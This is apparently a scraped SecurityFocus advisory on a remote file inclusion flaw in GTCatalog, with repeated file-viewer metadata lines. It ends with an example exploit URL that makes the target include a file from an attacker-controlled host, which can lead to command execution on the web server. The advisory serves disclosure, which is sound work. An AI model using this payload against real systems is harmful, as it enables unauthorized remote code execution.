9 lines
No EOL
639 B
Text
9 lines
No EOL
639 B
Text
source: https://www.securityfocus.com/bid/6998/info
|
|
|
|
GTCatalog is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.
|
|
|
|
This vulnerability is as a result of insufficient sanitization performed on remote user supplied data.
|
|
|
|
Under some circumstances, it is possible for remote attackers to manipulate URI parameters to include external files on remote servers. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.
|
|
|
|
http://www.target.com/index.php?function=custom&custom=http://www.attacker.com/1.custom.inc |